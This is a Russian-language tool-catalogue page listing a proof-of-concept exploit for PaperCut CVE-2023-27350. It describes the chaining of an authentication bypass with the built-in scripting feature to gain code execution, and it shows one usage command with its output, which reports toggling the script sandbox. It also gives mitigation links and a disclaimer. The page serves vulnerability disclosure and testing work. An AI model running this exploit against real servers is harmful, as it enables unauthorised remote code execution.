Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-27350 — Proof of Concept Exploit for PaperCut CVE-2023-27350 | Kitploit
Инструменты/GitHubGitHub/horizon3ai/cve-2023-27350
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingAuthenticationLearning & Education
GitHubhorizon3ai/cve-2023-27350

CVE-2023-27350

Proof of Concept Exploit for PaperCut CVE-2023-27350

Репозиторий
55243 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-27350

POC для CVE-2023-27350, затрагивающей PaperCut MF/NG

Технический анализ

Технический анализ первопричины уязвимости, индикаторы компрометации и информация о распространении в интернете доступны в нашем блоге: https://www.horizon3.ai/papercut-cve-2023-27350-deep-dive-and-indicators-of-compromise

Краткое описание

Этот POC использует уязвимость обхода аутентификации в связке с использованием встроенной функциональности скриптования для выполнения кода.

Использование

root@kitploit:~
python3 CVE-2023-27350.py --url 'http://10.0.40.56:9191' --command calc.exe
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y

Меры по смягчению

Обновите до последней версии или примите меры в соответствии с инструкциями в бюллетене безопасности PaperCut:

  • https://www.papercut.com/kb/Main/PO-1216-and-PO-1219

Следите за командой атак Horizon3.ai в Twitter для получения последних исследований в области безопасности:

  • Horizon3 Attack Team
  • James Horseman
  • Zach Hanley

Отказ от ответственности

Это программное обеспечение создано исключительно в целях академических исследований и для разработки эффективных методов защиты и не предназначено для атак на системы, за исключением случаев явного разрешения. Разработчики проекта не несут ответственности за неправомерное использование программного обеспечения. Используйте ответственно.

Скачать инструмент